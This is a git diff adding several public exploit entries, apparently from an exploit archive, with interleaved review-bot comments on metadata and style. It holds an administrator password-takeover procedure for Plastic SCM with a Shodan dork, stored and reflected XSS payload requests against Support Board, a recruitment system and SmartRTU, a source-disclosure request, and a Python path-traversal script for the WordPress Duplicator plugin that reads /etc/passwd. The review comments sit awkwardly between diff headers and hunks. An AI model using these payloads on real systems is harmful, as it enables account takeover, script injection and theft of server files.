diff --git a/exploits/multiple/webapps/50426.txt b/exploits/multiple/webapps/50426.txt
new file mode 100644
index 000000000..29bc38695
--- /dev/null
+++ b/exploits/multiple/webapps/50426.txt
@@ -0,0 +1,21 @@
+# Exploit Title: Plastic SCM 10.0.16.5622 - WebAdmin Server Access
+# Shodan Dork: title:"Plastic SCM"
+# Date: 18.10.2021
+# Exploit Author: Basavaraj Banakar
+# Vendor Homepage: https://www.plasticscm.com/
+# Software Link: https://www.plasticscm.com/download/releasenotes/10.0.16.5622
+# Version: Plastic SCM < 10.0.16.5622
+# Tested on: Chrome,Firefox,Edge
+# CVE : CVE-2021-41382
+
+# Reference: https://infosecwriteups.com/story-of-google-hall-of-fame-and-private-program-bounty-worth-53559a95c468
+
+# Exploit:
+
+1. Navigate to target.com/account [This holds administrator login console]
+
+2. Change URL to target.com/account/register [Here able to set new password for the adminstrator user]
+
+3. Now after changing password of administrator and login to console and Navigate to target.com/configuration/authentication and set an new password for any of the users
+
+4. Now navigate to target.com/webui/repos and login with the recently changed password for user i.e is in step 3
\ No newline at end of file
diff --git a/exploits/php/webapps/50419.txt b/exploits/php/webapps/50419.txt
new file mode 100644
index 000000000..aa738f827
--- /dev/null
+++ b/exploits/php/webapps/50419.txt
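Review bot: The affected-version information in 50426.txt is inconsistent: the Exploit Title names `Plastic SCM 10.0.16.5622` while the Version header says `Plastic SCM < 10.0.16.5622`, and the Software Link points at that same build's release notes. If 10.0.16.5622 is the release that closes CVE-2021-41382, the title should say so (e.g. `# Exploit Title: Plastic SCM < 10.0.16.5622 - WebAdmin Server Access`) so a reader can tell whether a deployment is affected; if it is instead the last vulnerable build, the Version line should read `<= 10.0.16.5622`. Step 2 also misspells `adminstrator`.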
@@ -0,0 +1,19 @@
+# Exploit Title: Support Board 3.3.4 - 'Message' Stored Cross-Site Scripting (XSS)
+# Date: 16/10/2021
+# Exploit Author: John Jefferson Li
+# Vendor Homepage: https://board.support/
+# Software Link: https://codecanyon.net/item/support-board-help-desk-and-chat/20359943
+# Version: 3.3.4
+# Tested on: Ubuntu 20.04.2 LTS, Windows 10
+
+POST /supportboard/include/ajax.php HTTP/1.1
+Cookie: [Agent+]
+Accept: */*
+Accept-Language: en-GB,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Content-Length: 808
+X-Requested-With: XMLHttpRequest
+Connection: close
+
+function=add-note&conversation_id=476&user_id=2&name=Robert+Smith&message=%3CScRiPt%3Ealert(/XSS/)%3C%2FsCriPt%3E&login-cookie=&language=false
\ No newline at end of file
diff --git a/exploits/php/webapps/50420.py b/exploits/php/webapps/50420.py
new file mode 100755
index 000000000..63edc44da
--- /dev/null
+++ b/exploits/php/webapps/50420.py
@@ -0,0 +1,24 @@
+# Exploit Title: Wordpress Plugin Duplicator 1.3.26 - Unauthenticated Arbitrary File Read
+# Date: October 16, 2021
+# Exploit Author: nam3lum
+# Vendor Homepage: https://wordpress.org/plugins/duplicator/
+# Software Link: https://downloads.wordpress.org/plugin/duplicator.1.3.26.zip]
+# Version: 1.3.26
+# Tested on: Ubuntu 16.04
+# CVE : CVE-2020-11738
+
+import requests as re
+import sys
+
+if len(sys.argv) != 3:
+ print("Exploit made by nam3lum.")
+ print("Usage: CVE-2020-11738.py http://192.168.168.167 /etc/passwd")
+ exit()
+
+arg = sys.argv[1]
+file = sys.argv[2]
+
+URL = arg + "/wp-admin/admin-ajax.php?action=duplicator_download&file=../../../../../../../../.." + file
+
+output = re.get(url = URL)
+print(output.text)
\ No newline at end of file
diff --git a/exploits/php/webapps/50421.txt b/exploits/php/webapps/50421.txt
new file mode 100644
index 000000000..a65b79859
--- /dev/null
+++ b/exploits/php/webapps/50421.txt
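Review bot: `import requests as re` in 50420.py binds the third-party `requests` package to the name of the standard-library `re` module, which misleads readers and would shadow any later regular-expression use; `import requests` with `output = requests.get(URL)` is the conventional form. The usage branch leaves via `exit()`, which is the site-module helper and returns status 0, so a wrong invocation is indistinguishable from success to a calling script; `sys.exit(1)` is already available through the `sys` import. The `print`/`exit` lines under the `if` appear indented by a single space, which may be an artifact of how this diff was collapsed, but if it reflects the file a four-space indent would match PEP 8. Minor: the Software Link header carries a stray trailing `]`.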
@@ -0,0 +1,72 @@
+# Exploit Title: Company's Recruitment Management System 1.0. - 'title' Stored Cross-Site Scripting (XSS)
+# Date: 17-10-2021
+# Exploit Author: Aniket Deshmane
+# Vendor Homepage: https://www.sourcecodester.com/php/14959/companys-recruitment-management-system-php-and-sqlite-free-source-code.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/employment_application.zip
+# Version: 1
+# Tested on: Windows 10,XAMPP
+
+Steps to Reproduce:
+1)Navigate to http://127.0.0.1/employment_application & Login with staff account .
+2) Navigate to vacancies tab
+3) Click on Add new .
+4)Add Payload
+">
+
+in Vacancy Title field.
+
+5)Click on Save and you are done. It's gonna be triggered when anyone
+visits the application.
+
+Request:-
+
+POST /employment_application/Actions.php?a=save_vacancy HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36
+(KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+Content-Type: multipart/form-data;
+boundary=---------------------------15502044322641666722659366422
+Content-Length: 931
+Origin: http://127.0.0.1
+DNT: 1
+Connection: close
+Cookie: PHPSESSID=e00mbu2u5cojpsh5jkaj9pjlfc
+Sec-Fetch-Dest: empty
+Sec-Fetch-Mode: cors
+Sec-Fetch-Site: same-origin
+Cache-Control: no-transform
+
+-----------------------------15502044322641666722659366422
+Content-Disposition: form-data; name="id"
+
+
+-----------------------------15502044322641666722659366422
+Content-Disposition: form-data; name="title"
+
+">
+-----------------------------15502044322641666722659366422
+Content-Disposition: form-data; name="designation_id"
+
+1
+-----------------------------15502044322641666722659366422
+Content-Disposition: form-data; name="slots"
+
+1
+-----------------------------15502044322641666722659366422
+Content-Disposition: form-data; name="status"
+
+1
+-----------------------------15502044322641666722659366422
+Content-Disposition: form-data; name="description"
+
+
+-----------------------------15502044322641666722659366422
+Content-Disposition: form-data; name="files"; filename=""
+Content-Type: application/octet-stream
+
+
+-----------------------------15502044322641666722659366422--
\ No newline at end of file
diff --git a/exploits/php/webapps/50422.txt b/exploits/php/webapps/50422.txt
new file mode 100644
index 000000000..6e38ab7b4
--- /dev/null
+++ b/exploits/php/webapps/50422.txt
@@ -0,0 +1,41 @@
+# Exploit Title: Mitsubishi Electric & INEA SmartRTU - Source Code Disclosure
+# Date: 2021-17-10
+# Exploit Author: Hamit CİBO
+# Vendor Homepage: https://www.inea.si
+# Software Link: https://www.inea.si/telemetrija-in-m2m-produkti/mertu/
+# Version: ME RTU
+# Tested on: Windows
+# CVE : CVE-2018-16060
+
+
+# PoC
+# Request
+
+GET /web HTTP/1.1
+Host: **.**.**.***
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64;
+x64; Trident/5.0)
+Connection: close
+
+# Response
+
+HTTP/1.1 200 OK
+Date: Wed, 08 Aug 2018 08:09:53 GMT
+Server: Apache/2.4.7 (Ubuntu)
+Content-Location: web.tar
+Vary: negotiate
+TCN: choice
+Last-Modified: Wed, 19 Nov 2014 09:40:36 GMT
+ETag: "93800-5083300f58d00;51179459a2c00"
+Accept-Ranges: bytes
+Content-Length: 604160
+Connection: close
+Content-Type: application/x-tar
+
+
+Reference :
+
+https://drive.google.com/open?id=1QMHwTnBbIqrTkR0NEpnTKssYdi8vRsHH
\ No newline at end of file
diff --git a/exploits/php/webapps/50423.txt b/exploits/php/webapps/50423.txt
new file mode 100644
index 000000000..78e96f4d2
--- /dev/null
+++ b/exploits/php/webapps/50423.txt
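Review bot: The Date header in 50422.txt reads `2021-17-10`, which is not a valid date (there is no month 17); the day and month appear to be swapped and the line should presumably be `# Date: 2021-10-17`. The same value appears in the Date header of 50423.txt in the following hunk. The Version header `ME RTU` is a product name rather than a firmware or software version, so a reader cannot tell from the advisory which builds CVE-2018-16060 applies to; if the referenced write-up gives an affected version range, it belongs on that line.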
@@ -0,0 +1,57 @@
+# Exploit Title: Mitsubishi Electric & INEA SmartRTU - Reflected Cross-Site Scripting (XSS)
+# Date: 2021-17-10
+# Exploit Author: Hamit CİBO
+# Vendor Homepage: https://www.inea.si
+# Software Link: https://www.inea.si/telemetrija-in-m2m-produkti/mertu/
+# Version: ME RTU
+# Tested on: Windows
+# CVE : CVE-2018-16061
+
+
+# PoC
+# Request
+
+POST
+/login.php/srdzz'onmouseover%3d'alert(1)'style%3d'position%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%
+3btop%3a0%3bleft%3a0%3b'bsmy8 HTTP/1.1
+Host: **.**.**.***
+Content-Length: 132
+Cache-Control: max-age=0
+Origin: http://**.**.**.***
+Upgrade-Insecure-Requests: 1
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36
+(KHTML, like Gecko) Chrome/68.0.3440.84
+Safari/537.36
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
+Referer: http://**.**.**.***sss/login.php
+Accept-Encoding: gzip, deflate
+Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
+Cookie: PHPSESSID=el8pvccq5747u4qj9koio950l7
+Connection: close
+
+submitted=1&username=--
+%3E%27%22%2F%3E%3C%2FsCript%3E%3CsvG+x%3D%22%3E%22+onload%3D%28co%5Cu006efirm%29%60%60&passw
+ord=&Submit=Login
+
+# Response
+
+HTTP/1.1 200 OK
+Date: Wed, 08 Aug 2018 08:14:25 GMT
+Server: Apache/2.4.7 (Ubuntu)
+X-Powered-By: PHP/5.5.9-1ubuntu4
+Vary: Accept-Encoding
+Content-Length: 3573
+Connection: close
+Content-Type: text/html
+
+